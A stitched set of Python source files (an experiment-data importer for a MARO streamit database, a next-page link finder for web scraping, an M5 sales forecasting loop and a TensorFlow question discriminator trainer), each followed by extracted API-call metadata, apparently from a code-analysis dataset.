                    field_dict[field_name] = [v.item() for v in value]

            streamit.data(category, **field_dict)

    return instance_number
def import_port_details(streamit, folder: str):
    """Import port details into database from specified folder.

    Args:
        streamit (streamit) : Streamit instance.
        folder (str): Folder path that contains the port detail file.
    """
    # Thin wrapper: fixed file names and category for ports.
    return import_from_snapshot_dump(streamit, folder, "ports.npy", "ports.meta", "port_details")
def import_vessel_details(streamit, folder: str):
    """Import vessel details into database.

    Args:
        streamit (streamit) : Streamit instance.
        folder (str): Folder path that contains vessel details.
    """
    # Thin wrapper: fixed file names and category for vessels.
    return import_from_snapshot_dump(streamit, folder, "vessels.npy", "vessels.meta", "vessel_details")
def import_full_on_ports(streamit, data: np.ndarray, port_number: int):
    """Import full_on_ports information into database.

    Args:
        streamit (streamit) : Streamit instance.
        data (numpy.ndarray): Data of full_on_ports.
        port_number (int): Number of ports.
    """
    for tick, frame in enumerate(data):
        streamit.tick(tick)

        matrix = frame[0].reshape(port_number, -1)

        # Only cells with a positive quantity are worth saving.
        src_indices, dest_indices = np.where(matrix > 0)

        for src, dest in zip(src_indices, dest_indices):
            streamit.data(
                "full_on_ports",
                from_port_index=src,
                dest_port_index=dest,
                quantity=matrix[src, dest]
            )
def import_full_on_vessels(streamit, data: np.ndarray, port_number: int, vessel_number: int):
    """Import full_on_vessels data into database.

    Args:
        streamit (streamit) : Streamit instance.
        data (numpy.ndarray): Data that contains full_on_vessels matrix.
        port_number (int): Number of ports.
        vessel_number (int): Number of vessels.
    """
    for tick, frame in enumerate(data):
        streamit.tick(tick)

        matrix = frame[0].reshape(vessel_number, port_number)

        # Only cells with a positive quantity are worth saving.
        vessel_rows, port_cols = np.where(matrix > 0)

        for vessel, port in zip(vessel_rows, port_cols):
            streamit.data(
                "full_on_vessels",
                vessel_index=vessel,
                port_index=port,
                quantity=matrix[vessel, port]
            )
def import_vessel_plans(streamit, data: np.ndarray, port_number: int, vessel_number: int):
    """Import vessel_plans matrix into database.

    Args:
        streamit (streamit) : Streamit instance.
        data (numpy.ndarray): Data that contains vessel_plans matrix.
        port_number (int): Number of ports.
        vessel_number (int): Number of vessels.
    """
    for tick, frame in enumerate(data):
        streamit.tick(tick)

        matrix = frame[0].reshape(vessel_number, port_number)

        # -1 marks "no plan"; everything else is a valid arrival tick.
        vessel_rows, port_cols = np.where(matrix > -1)

        for vessel, port in zip(vessel_rows, port_cols):
            streamit.data(
                "vessel_plans",
                vessel_index=vessel,
                port_index=port,
                planed_arrival_tick=matrix[vessel, port]
            )
def import_metrics(streamit, epoch_full_path: str, port_number: int, vessel_number: int):
    """Import matrix into database.

    Args:
        streamit (streamit) : Streamit instance.
        epoch_full_path (str): Path that for target epoch.
        port_number (int): Number of ports.
        vessel_number (int): Number of vessels.
    """
    # matrices.npy bundles the three named matrices for the epoch.
    matrices = np.load(os.path.join(epoch_full_path, "matrices.npy"))

    import_full_on_ports(streamit, matrices["full_on_ports"], port_number)
    import_full_on_vessels(streamit, matrices["full_on_vessels"], port_number, vessel_number)
    import_vessel_plans(streamit, matrices["vessel_plans"], port_number, vessel_number)
def import_attention(streamit, atts_path: str):
    """Import attention data into database.

    Args:
        streamit (streamit) : Streamit instance.
        atts_path (str): Path to attention pickle file.
    """
    with open(atts_path, "rb") as fp:
        # List of tuple (tick, attention dict contains: "p2p", "p2v", "v2p").
        attentions = pickle.load(fp)

    # NOTE: the previous 'attention_index' counter was dead code and removed.
    for tick, attention in attentions:
        # Ticks may be stored as strings in the dump.
        streamit.tick(int(tick))
        streamit.complex("attentions", attention)
# Entry point: bulk-import a dumped MARO experiment (snapshot epochs plus the
# attention file) into the streamit data service.
if __name__ == "__main__":
    parser = ArgumentParser()
    parser.add_argument("--name", required=True,
                        help="Experiment name show in databas")
    parser.add_argument("--scenario", required=True,
                        help="Scenario name of import experiment")
    parser.add_argument("--topology", required=True,
                        help="Topology of target scenario")
    parser.add_argument("--durations", required=True,
                        type=int, help="Durations of each episode")
    parser.add_argument("--episodes", required=True, type=int,
                        help="Total episode of this experiment")
    parser.add_argument("--dir", required=True,
                        help="Root folder of dump files")
    parser.add_argument(
        "--ssdir", help="Folder that contains snapshots data that with epoch_x sub-folders")
    parser.add_argument("--host", default="127.0.0.1",
                        help="Host of questdb server")
    args = parser.parse_args()
    # Both dump folders must exist before we start importing.
    assert (os.path.exists(args.dir))
    assert (os.path.exists(args.ssdir))
    # Force enable streamit.
    # NOTE: these environment variables must be set BEFORE importing
    # maro.streamit below - presumably the module reads them at import time,
    # which is why the import is deferred to this point.
    os.environ["MARO_STREAMIT_ENABLED"] = "true"
    os.environ["MARO_STREAMIT_EXPERIMENT_NAME"] = args.name
    from maro.streamit import streamit
    with streamit:
        # experiment name
        with open(os.path.join(args.dir, "config.yml"), "r") as fp:
            config = yaml.safe_load(fp)
        # streamit.info(args.scenario, args.topology, args.durations, args.episodes)
        streamit.complex("config", config)
        for episode in range(args.episodes):
            epoch_folder = f"epoch_{episode}"
            epoch_full_path = os.path.join(args.ssdir, epoch_folder)
            # ensure epoch folder exist
            if os.path.exists(epoch_full_path):
                streamit.episode(episode)
                # import for each category; the port/vessel counts returned
                # here feed the matrix imports that follow.
                port_number = import_port_details(streamit, epoch_full_path)
                vessel_number = import_vessel_details(streamit, epoch_full_path)
                import_metrics(streamit, epoch_full_path, port_number, vessel_number)
        # NOTE: we only have one attention file for now, so hard coded here
        streamit.episode(0)
        import_attention(streamit, os.path.join(args.dir, "atts_1"))
| [
"numpy.load",
"argparse.ArgumentParser",
"maro.streamit.streamit.episode",
"maro.streamit.streamit.data",
"maro.streamit.streamit.complex",
"os.path.exists",
"maro.streamit.streamit.tick",
"numpy.where",
"pickle.load",
"yaml.safe_load",
"os.path.join"
] | [((675, 705), 'os.path.join', 'os.path.join', (['folder', 'npy_name'], {}), '(folder, npy_name)\n', (687, 705), False, 'import os\n'), ((722, 753), 'os.path.join', 'os.path.join', (['folder', 'meta_name'], {}), '(folder, meta_name)\n', (734, 753), False, 'import os\n'), ((1013, 1030), 'numpy.load', 'np.load', (['npy_path'], {}), '(npy_path)\n', (1020, 1030), True, 'import numpy as np\n'), ((5657, 5702), 'os.path.join', 'os.path.join', (['epoch_full_path', '"""matrices.npy"""'], {}), "(epoch_full_path, 'matrices.npy')\n", (5669, 5702), False, 'import os\n'), ((5718, 5739), 'numpy.load', 'np.load', (['matrics_path'], {}), '(matrics_path)\n', (5725, 5739), True, 'import numpy as np\n'), ((6584, 6600), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (6598, 6600), False, 'from argparse import ArgumentParser\n'), ((7579, 7603), 'os.path.exists', 'os.path.exists', (['args.dir'], {}), '(args.dir)\n', (7593, 7603), False, 'import os\n'), ((7617, 7643), 'os.path.exists', 'os.path.exists', (['args.ssdir'], {}), '(args.ssdir)\n', (7631, 7643), False, 'import os\n'), ((1182, 1201), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (1195, 1201), False, 'from maro.streamit import streamit\n'), ((3237, 3256), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (3250, 3256), False, 'from maro.streamit import streamit\n'), ((3370, 3385), 'numpy.where', 'np.where', (['(m > 0)'], {}), '(m > 0)\n', (3378, 3385), True, 'import numpy as np\n'), ((4100, 4119), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (4113, 4119), False, 'from maro.streamit import streamit\n'), ((4199, 4214), 'numpy.where', 'np.where', (['(m > 0)'], {}), '(m > 0)\n', (4207, 4214), True, 'import numpy as np\n'), ((4898, 4917), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (4911, 4917), False, 'from maro.streamit import streamit\n'), ((4997, 5013), 'numpy.where', 'np.where', (['(m > -1)'], 
{}), '(m > -1)\n', (5005, 5013), True, 'import numpy as np\n'), ((6252, 6267), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (6263, 6267), False, 'import pickle\n'), ((6471, 6490), 'maro.streamit.streamit.tick', 'streamit.tick', (['tick'], {}), '(tick)\n', (6484, 6490), False, 'from maro.streamit import streamit\n'), ((6500, 6541), 'maro.streamit.streamit.complex', 'streamit.complex', (['"""attentions"""', 'attention'], {}), "('attentions', attention)\n", (6516, 6541), False, 'from maro.streamit import streamit\n'), ((8072, 8106), 'maro.streamit.streamit.complex', 'streamit.complex', (['"""config"""', 'config'], {}), "('config', config)\n", (8088, 8106), False, 'from maro.streamit import streamit\n'), ((8775, 8794), 'maro.streamit.streamit.episode', 'streamit.episode', (['(0)'], {}), '(0)\n', (8791, 8794), False, 'from maro.streamit import streamit\n'), ((1951, 1988), 'maro.streamit.streamit.data', 'streamit.data', (['category'], {}), '(category, **field_dict)\n', (1964, 1988), False, 'from maro.streamit import streamit\n'), ((3462, 3604), 'maro.streamit.streamit.data', 'streamit.data', (['"""full_on_ports"""'], {'from_port_index': 'from_port_index', 'dest_port_index': 'to_port_index', 'quantity': 'm[from_port_index, to_port_index]'}), "('full_on_ports', from_port_index=from_port_index,\n dest_port_index=to_port_index, quantity=m[from_port_index, to_port_index])\n", (3475, 3604), False, 'from maro.streamit import streamit\n'), ((4285, 4410), 'maro.streamit.streamit.data', 'streamit.data', (['"""full_on_vessels"""'], {'vessel_index': 'vessel_index', 'port_index': 'port_index', 'quantity': 'm[vessel_index, port_index]'}), "('full_on_vessels', vessel_index=vessel_index, port_index=\n port_index, quantity=m[vessel_index, port_index])\n", (4298, 4410), False, 'from maro.streamit import streamit\n'), ((5084, 5217), 'maro.streamit.streamit.data', 'streamit.data', (['"""vessel_plans"""'], {'vessel_index': 'vessel_index', 'port_index': 'port_index', 
'planed_arrival_tick': 'm[vessel_index, port_index]'}), "('vessel_plans', vessel_index=vessel_index, port_index=\n port_index, planed_arrival_tick=m[vessel_index, port_index])\n", (5097, 5217), False, 'from maro.streamit import streamit\n'), ((7959, 7977), 'yaml.safe_load', 'yaml.safe_load', (['fp'], {}), '(fp)\n', (7973, 7977), False, 'import yaml\n'), ((8230, 8268), 'os.path.join', 'os.path.join', (['args.ssdir', 'epoch_folder'], {}), '(args.ssdir, epoch_folder)\n', (8242, 8268), False, 'import os\n'), ((8325, 8356), 'os.path.exists', 'os.path.exists', (['epoch_full_path'], {}), '(epoch_full_path)\n', (8339, 8356), False, 'import os\n'), ((8830, 8862), 'os.path.join', 'os.path.join', (['args.dir', '"""atts_1"""'], {}), "(args.dir, 'atts_1')\n", (8842, 8862), False, 'import os\n'), ((7888, 7924), 'os.path.join', 'os.path.join', (['args.dir', '"""config.yml"""'], {}), "(args.dir, 'config.yml')\n", (7900, 7924), False, 'import os\n'), ((8374, 8399), 'maro.streamit.streamit.episode', 'streamit.episode', (['episode'], {}), '(episode)\n', (8390, 8399), False, 'from maro.streamit import streamit\n')] |
import jellyfish
import math
import numpy as np
from bs4 import BeautifulSoup
import requests
import threading
import re
from . import YDHP_SiteInfo, YDHP_ScrapySystem
class NextPage:
def __init__(self, html, site_info):
self.m_html = html
self.m_site_info = site_info
def next_page(self):
"""
§ Find all the links hidden inside html
§ Remove duplicated and fetched uris
§ jaro distance between these uris and the example uri
§ Find the mean distance
§ Select uris that distance < mean distance
@:return list of urls that might be possible for next page(s)
"""
possible_uris = self.find_a_href_tags()
possible_uris = list(set(possible_uris))
for fetched_url in self.m_site_info.fetched_urls:
try:
possible_uris.remove(fetched_url)
except:
pass
re_possible_dicts_list = list()
threads = []
for target in possible_uris:
threads.append(threading.Thread(target=self.jaro_distance(target, re_possible_dicts_list)))
[thread.start() for thread in threads]
[thread.join() for thread in threads]
average_distance = self.avge_distance(re_possible_dicts_list)
threads = list()
for target in re_possible_dicts_list:
threads.append(threading.Thread(target=self.remove_large_distance_target, args=(average_distance, target, re_possible_dicts_list)))
[thread.start() for thread in threads]
[thread.join() for thread in threads]
next_uris = list()
[next_uris.append(possible_dict['target']) for possible_dict in re_possible_dicts_list]
return next_uris
def remove_large_distance_target(self, average_distance, target, re_possible_dicts_list):
if target['distance'] >= average_distance: re_possible_dicts_list.remove(target)
def avge_distance(self, possible_dicts_list):
distances = list()
for possible_dict in possible_dicts_list:
distances.append(possible_dict['distance'])
return np.average(distances)
def jaro_distance(self, target, re_possible_dicts_list):
possible_dict = {
'target': target
,'distance': float(jellyfish.jaro_distance(self.m_site_info.start_url, target))
}
re_possible_dicts_list.append(possible_dict)
def find_a_href_tags(self):
bs_obj = BeautifulSoup(self.m_html, 'lxml')
targets = []
for target in bs_obj.findAll("a"):
if 'href' in target.attrs:
targets.append(target.attrs['href'])
return targets
| [
"bs4.BeautifulSoup",
"threading.Thread",
"jellyfish.jaro_distance",
"numpy.average"
] | [((2125, 2146), 'numpy.average', 'np.average', (['distances'], {}), '(distances)\n', (2135, 2146), True, 'import numpy as np\n'), ((2490, 2524), 'bs4.BeautifulSoup', 'BeautifulSoup', (['self.m_html', '"""lxml"""'], {}), "(self.m_html, 'lxml')\n", (2503, 2524), False, 'from bs4 import BeautifulSoup\n'), ((1382, 1502), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.remove_large_distance_target', 'args': '(average_distance, target, re_possible_dicts_list)'}), '(target=self.remove_large_distance_target, args=(\n average_distance, target, re_possible_dicts_list))\n', (1398, 1502), False, 'import threading\n'), ((2308, 2367), 'jellyfish.jaro_distance', 'jellyfish.jaro_distance', (['self.m_site_info.start_url', 'target'], {}), '(self.m_site_info.start_url, target)\n', (2331, 2367), False, 'import jellyfish\n')] |
import sys
import numpy as np
import pandas as pd
import csv
import os
import ast
import logging
from paths import *
from data.etl import etl, over_sample
from models import train_model, predict_model
from pathlib import Path
# logger config
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
fh = logging.FileHandler(log_path / 'log_group.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
logger.addHandler(ch)
logger.addHandler(fh)
# group-level params
level = 'group' # group or item level
ind = 1942 #1913 to create validation forecast
run = 'no' #whether or not to run SMOTE
def create_csv(path):
if os.path.exists(path):
print(path, " already exists")
df = pd.read_csv(path, names=['val1','val2'])
return df
else:
with open(path, "w") as empty:
pass
df = pd.read_csv(path, names=['val1','val2'])
return df
# sales data set, extend to include d_1942 - d_1969
sales_master = pd.read_csv(data_path / 'raw/sales_train_evaluation.csv')
seq = np.arange(1942,1970,1)
for i in seq:
col = ('d_'+ str(i))
sales_master[col] = 0
# read calendar, sell_price datasets
calendar = pd.read_csv(data_path / 'raw/calendar.csv')
calendar.drop(columns=['date','weekday'], inplace=True)
sell = pd.read_csv(data_path / 'raw/sell_prices.csv')
# stratification
list_of_segments = [
['state_id'],
['state_id','store_id'],
['state_id','store_id', 'cat_id'],
['state_id','store_id', 'cat_id', 'dept_id']
]
# let's loop through the list_of_segments
# this will create forecasts for all combinations at each of the 4 levels
for i in range(len(list_of_segments)):
seg_list = list_of_segments[i]
# create repective csv file for appending to later
params_path = model_path / str("_".join(seg_list) + '_best_params.csv')
forecast_path = data_path / 'processed' / str("_".join(seg_list) + '_forecast.csv')
# create csv files
successful = create_csv(forecast_path)
best_params = create_csv(params_path)
# unique combination of values based on stratification
length = len(seg_list) # this wil drive the number of filter statements below
uniq_df = sales_master[seg_list].drop_duplicates()
# iterate through rows in uniq_df
for i in range(len(uniq_df)):
# string is for the dynamic filter statement, segment is specific combination to train
string = []
segment = []
for j in range(length):
# dynamic filter statement
add = "(sales_master." + seg_list[j] + " == '" + uniq_df.iloc[i,j] + "')"
string.append(add)
# segment
seg = uniq_df.iloc[i,j]
segment.append(seg)
# use "&" to join the filter statements in "string" list, filter sales_master
final_string = "&".join(string)
id_list = sales_master[eval(final_string)].id.to_list()
# now that we've identified the id's that fall into this segment
# let's transform the data, train, and create forecasts
x = str("_".join(segment))
logger.debug('RUNNING SEGMENT {}'.format(x))
logger.debug('Filter statement for {} is {}'.format(x, final_string))
# check to see if best model parameters exist
if ((os.path.getsize(params_path) > 0) & (best_params.val1==x).any()):
logger.debug("Best parameters for {} already exists".format(x))
# check to see if forecast already exists
if ((os.path.getsize(forecast_path) > 0) & (successful.val1==x).any()):
logger.debug("Forecast for {} already exists".format(x))
else:
# grab best model params
model_params = best_params[best_params.val1==x].val2.to_dict()
key, params = model_params.popitem()
# perform data transformations
merge_df, etl_df = etl(sales_master, calendar, sell, id_list, level, ind)
X, y = over_sample(etl_df, run)
logger.debug("Creating forecast for {} segment".format("_".join(segment)))
forecast = predict_lgb(X, y, merge_df, ast.literal_eval(params), ind)
row_contents = ["_".join(segment), str(forecast)]
with open(forecast_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents)
else:
# train and create forecast
logger.debug("Transforming data for {} segment".format(x))
merge_df, etl_df = etl(sales_master, calendar, sell, id_list, level, ind)
X, y = over_sample(etl_df, run)
logger.debug("Training for {} segment".format(x))
params = train_lgb(X, y)
# append best parameter results
row_contents = ["_".join(segment), str(params)]
with open(params_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents)
logger.debug("Creating forecast for {} segment".format(x))
forecast = predict_lgb(X, y, merge_df, params, ind)
row_contents = ["_".join(segment), str(forecast)]
with open(forecast_path, 'a') as fd:
wr = csv.writer(fd)
wr.writerow(row_contents) | [
"ast.literal_eval",
"logging.FileHandler",
"csv.writer",
"pandas.read_csv",
"os.path.getsize",
"logging.StreamHandler",
"os.path.exists",
"data.etl.etl",
"logging.Formatter",
"numpy.arange",
"data.etl.over_sample",
"logging.getLogger"
] | [((252, 279), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (269, 279), False, 'import logging\n'), ((317, 340), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (338, 340), False, 'import logging\n'), ((374, 421), 'logging.FileHandler', 'logging.FileHandler', (["(log_path / 'log_group.log')"], {}), "(log_path / 'log_group.log')\n", (393, 421), False, 'import logging\n'), ((462, 568), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n", (479, 568), False, 'import logging\n'), ((1180, 1237), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/sales_train_evaluation.csv')"], {}), "(data_path / 'raw/sales_train_evaluation.csv')\n", (1191, 1237), True, 'import pandas as pd\n'), ((1245, 1269), 'numpy.arange', 'np.arange', (['(1942)', '(1970)', '(1)'], {}), '(1942, 1970, 1)\n', (1254, 1269), True, 'import numpy as np\n'), ((1382, 1425), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/calendar.csv')"], {}), "(data_path / 'raw/calendar.csv')\n", (1393, 1425), True, 'import pandas as pd\n'), ((1489, 1535), 'pandas.read_csv', 'pd.read_csv', (["(data_path / 'raw/sell_prices.csv')"], {}), "(data_path / 'raw/sell_prices.csv')\n", (1500, 1535), True, 'import pandas as pd\n'), ((841, 861), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (855, 861), False, 'import os\n'), ((915, 956), 'pandas.read_csv', 'pd.read_csv', (['path'], {'names': "['val1', 'val2']"}), "(path, names=['val1', 'val2'])\n", (926, 956), True, 'import pandas as pd\n'), ((1053, 1094), 'pandas.read_csv', 'pd.read_csv', (['path'], {'names': "['val1', 'val2']"}), "(path, names=['val1', 'val2'])\n", (1064, 1094), True, 'import pandas as pd\n'), ((4788, 4842), 'data.etl.etl', 'etl', (['sales_master', 'calendar', 'sell', 'id_list', 'level', 'ind'], {}), 
'(sales_master, calendar, sell, id_list, level, ind)\n', (4791, 4842), False, 'from data.etl import etl, over_sample\n'), ((4862, 4886), 'data.etl.over_sample', 'over_sample', (['etl_df', 'run'], {}), '(etl_df, run)\n', (4873, 4886), False, 'from data.etl import etl, over_sample\n'), ((3495, 3523), 'os.path.getsize', 'os.path.getsize', (['params_path'], {}), '(params_path)\n', (3510, 3523), False, 'import os\n'), ((4136, 4190), 'data.etl.etl', 'etl', (['sales_master', 'calendar', 'sell', 'id_list', 'level', 'ind'], {}), '(sales_master, calendar, sell, id_list, level, ind)\n', (4139, 4190), False, 'from data.etl import etl, over_sample\n'), ((4214, 4238), 'data.etl.over_sample', 'over_sample', (['etl_df', 'run'], {}), '(etl_df, run)\n', (4225, 4238), False, 'from data.etl import etl, over_sample\n'), ((5160, 5174), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (5170, 5174), False, 'import csv\n'), ((5486, 5500), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (5496, 5500), False, 'import csv\n'), ((3721, 3751), 'os.path.getsize', 'os.path.getsize', (['forecast_path'], {}), '(forecast_path)\n', (3736, 3751), False, 'import os\n'), ((4386, 4410), 'ast.literal_eval', 'ast.literal_eval', (['params'], {}), '(params)\n', (4402, 4410), False, 'import ast\n'), ((4562, 4576), 'csv.writer', 'csv.writer', (['fd'], {}), '(fd)\n', (4572, 4576), False, 'import csv\n')] |
import sys,json,math
sys.path.insert(0, "/Users/tom/Dropbox/msc-ml/project/src/")
sys.path.insert(0, "/cs/student/msc/ml/2017/thosking/dev/msc-project/src/")
sys.path.insert(0, "/home/thosking/msc-project/src/")
import tensorflow as tf
import numpy as np
from instance import DiscriminatorInstance
import helpers.loader as loader
from tqdm import tqdm
def main(_):
FLAGS = tf.app.flags.FLAGS
# results=results[:32]
# dev_ctxts, dev_qs,dev_ans,dev_ans_pos, dev_correct = zip(*squad_dev)
positive_data=[]
negative_data=[]
if FLAGS.disc_trainongenerated is True:
with open(FLAGS.log_dir+'out_eval_'+ FLAGS.disc_modelslug +'.json') as f:
results = json.load(f)
# for res in results:
# qpred,qgold,ctxt,ans_text,ans_pos =res
for res in results['results']:
positive_data.append( (res['c'], res['q_gold'], res['a_text'], res['a_pos']) )
negative_data.append( (res['c'], res['q_pred'], res['a_text'], res['a_pos']) )
if FLAGS.disc_trainonsquad is True:
squad_v2 = loader.load_squad_triples(FLAGS.data_path, FLAGS.disc_dev_set, v2=True)
for res in squad_v2:
ctxt,q,ans_text,ans_pos,label =res
if label is False: # label is "is_unanswerable"
positive_data.append( (ctxt.lower(), q.lower(), ans_text.lower(), ans_pos) )
else:
negative_data.append( (ctxt.lower(), q.lower(), ans_text.lower(), ans_pos) )
num_instances = min(len(negative_data), len(positive_data))
disc = DiscriminatorInstance(path=(FLAGS.model_dir+'saved/qanet2/' if FLAGS.disc_init_qanet is True else None), trainable=True, log_slug=FLAGS.disc_modelslug+("_SQUAD" if FLAGS.disc_trainonsquad else "")+("_QAINIT" if FLAGS.disc_init_qanet else ""), force_init=FLAGS.disc_init_qanet)
# disc.load_from_chkpt() # this loads the embeddings etc
train_samples = math.floor(0.8*num_instances)
dev_samples = math.floor(0.2*num_instances)
positive_data_train = positive_data[:train_samples]
negative_data_train = negative_data[:train_samples]
positive_data_dev = positive_data[train_samples:]
negative_data_dev = negative_data[train_samples:]
num_steps_train = train_samples//FLAGS.batch_size
num_steps_dev = dev_samples//FLAGS.batch_size
num_steps_squad = num_steps_dev
best_oos_nll=1e6
for i in tqdm(range(num_steps_train*FLAGS.disc_num_epochs), desc='Training'):
if i % num_steps_train ==0:
np.random.shuffle(positive_data_train)
np.random.shuffle(negative_data_train)
ixs = np.round(np.random.binomial(1,0.5,FLAGS.batch_size))
# batch = train_data[i*FLAGS.batch_size:(i+1)*FLAGS.batch_size]
batch = [negative_data_train[(i% num_steps_train)*FLAGS.batch_size+j] if ix < 0.5 else positive_data_train[(i% num_steps_train)*FLAGS.batch_size+j] for j,ix in enumerate(ixs.tolist())]
ctxt,qbatch,ans_text,ans_pos = zip(*batch)
# print(ixs)
# print(qbatch)
# print(ans_text)
# print(ans_pos)
# print(ctxt)
# exit()
# +qpred[ix].replace("</Sent>","").replace("<PAD>","")
qbatch = [q.replace(" </Sent>","").replace(" <PAD>","") for q in qbatch]
# qbatch = ["fake " if ixs[ix] < 0.5 else "real " for ix in range(FLAGS.batch_size)]
# print(qbatch, ixs)
loss = disc.train_step(ctxt, qbatch, ans_text, ans_pos, ixs, (i))
if i % 1000 == 0 and i >0:
dev_acc=[]
dev_nll=[]
for dev_i in tqdm(range(num_steps_dev), desc='Step '+str(i) + " dev"):
ixs = np.round(np.random.binomial(1,0.5,FLAGS.batch_size))
batch = [negative_data_dev[dev_i*FLAGS.batch_size+j] if ix < 0.5 else positive_data_dev[dev_i*FLAGS.batch_size+j] for j,ix in enumerate(ixs.tolist())]
ctxt,qbatch,ans_text,ans_pos = zip(*batch)
qbatch = [q.replace(" </Sent>","").replace(" <PAD>","") for q in qbatch]
pred = disc.get_pred(ctxt, qbatch, ans_text, ans_pos)
nll = disc.get_nll(ctxt, qbatch, ans_text, ans_pos, ixs)
acc = 1.0*np.equal(np.round(pred), ixs)
dev_acc.extend(acc.tolist())
dev_nll.extend(nll.tolist())
accsummary = tf.Summary(value=[tf.Summary.Value(tag="dev_perf/acc",
simple_value=np.mean(dev_acc))])
nllsummary = tf.Summary(value=[tf.Summary.Value(tag="dev_perf/nll",
simple_value=np.mean(dev_nll))])
disc.summary_writer.add_summary(accsummary, global_step=i)
disc.summary_writer.add_summary(nllsummary, global_step=i)
print(np.mean(dev_acc))
if np.mean(dev_nll) < best_oos_nll:
best_oos_nll=np.mean(dev_nll)
disc.save_to_chkpt(FLAGS.model_dir, i)
print("New best NLL, saving")
if __name__ == "__main__":
tf.app.run()
| [
"json.load",
"numpy.random.binomial",
"numpy.round",
"math.floor",
"sys.path.insert",
"numpy.mean",
"helpers.loader.load_squad_triples",
"instance.DiscriminatorInstance",
"tensorflow.app.run",
"numpy.random.shuffle"
] | [((21, 81), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/Users/tom/Dropbox/msc-ml/project/src/"""'], {}), "(0, '/Users/tom/Dropbox/msc-ml/project/src/')\n", (36, 81), False, 'import sys, json, math\n'), ((82, 157), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/cs/student/msc/ml/2017/thosking/dev/msc-project/src/"""'], {}), "(0, '/cs/student/msc/ml/2017/thosking/dev/msc-project/src/')\n", (97, 157), False, 'import sys, json, math\n'), ((158, 211), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/home/thosking/msc-project/src/"""'], {}), "(0, '/home/thosking/msc-project/src/')\n", (173, 211), False, 'import sys, json, math\n'), ((1569, 1869), 'instance.DiscriminatorInstance', 'DiscriminatorInstance', ([], {'path': "(FLAGS.model_dir + 'saved/qanet2/' if FLAGS.disc_init_qanet is True else None)", 'trainable': '(True)', 'log_slug': "(FLAGS.disc_modelslug + ('_SQUAD' if FLAGS.disc_trainonsquad else '') + (\n '_QAINIT' if FLAGS.disc_init_qanet else ''))", 'force_init': 'FLAGS.disc_init_qanet'}), "(path=FLAGS.model_dir + 'saved/qanet2/' if FLAGS.\n disc_init_qanet is True else None, trainable=True, log_slug=FLAGS.\n disc_modelslug + ('_SQUAD' if FLAGS.disc_trainonsquad else '') + (\n '_QAINIT' if FLAGS.disc_init_qanet else ''), force_init=FLAGS.\n disc_init_qanet)\n", (1590, 1869), False, 'from instance import DiscriminatorInstance\n'), ((1929, 1960), 'math.floor', 'math.floor', (['(0.8 * num_instances)'], {}), '(0.8 * num_instances)\n', (1939, 1960), False, 'import sys, json, math\n'), ((1977, 2008), 'math.floor', 'math.floor', (['(0.2 * num_instances)'], {}), '(0.2 * num_instances)\n', (1987, 2008), False, 'import sys, json, math\n'), ((5044, 5056), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (5054, 5056), True, 'import tensorflow as tf\n'), ((1079, 1150), 'helpers.loader.load_squad_triples', 'loader.load_squad_triples', (['FLAGS.data_path', 'FLAGS.disc_dev_set'], {'v2': '(True)'}), '(FLAGS.data_path, FLAGS.disc_dev_set, v2=True)\n', (1104, 
1150), True, 'import helpers.loader as loader\n'), ((702, 714), 'json.load', 'json.load', (['f'], {}), '(f)\n', (711, 714), False, 'import sys, json, math\n'), ((2524, 2562), 'numpy.random.shuffle', 'np.random.shuffle', (['positive_data_train'], {}), '(positive_data_train)\n', (2541, 2562), True, 'import numpy as np\n'), ((2575, 2613), 'numpy.random.shuffle', 'np.random.shuffle', (['negative_data_train'], {}), '(negative_data_train)\n', (2592, 2613), True, 'import numpy as np\n'), ((2637, 2681), 'numpy.random.binomial', 'np.random.binomial', (['(1)', '(0.5)', 'FLAGS.batch_size'], {}), '(1, 0.5, FLAGS.batch_size)\n', (2655, 2681), True, 'import numpy as np\n'), ((4797, 4813), 'numpy.mean', 'np.mean', (['dev_acc'], {}), '(dev_acc)\n', (4804, 4813), True, 'import numpy as np\n'), ((4830, 4846), 'numpy.mean', 'np.mean', (['dev_nll'], {}), '(dev_nll)\n', (4837, 4846), True, 'import numpy as np\n'), ((4892, 4908), 'numpy.mean', 'np.mean', (['dev_nll'], {}), '(dev_nll)\n', (4899, 4908), True, 'import numpy as np\n'), ((3675, 3719), 'numpy.random.binomial', 'np.random.binomial', (['(1)', '(0.5)', 'FLAGS.batch_size'], {}), '(1, 0.5, FLAGS.batch_size)\n', (3693, 3719), True, 'import numpy as np\n'), ((4214, 4228), 'numpy.round', 'np.round', (['pred'], {}), '(pred)\n', (4222, 4228), True, 'import numpy as np\n'), ((4464, 4480), 'numpy.mean', 'np.mean', (['dev_acc'], {}), '(dev_acc)\n', (4471, 4480), True, 'import numpy as np\n'), ((4615, 4631), 'numpy.mean', 'np.mean', (['dev_nll'], {}), 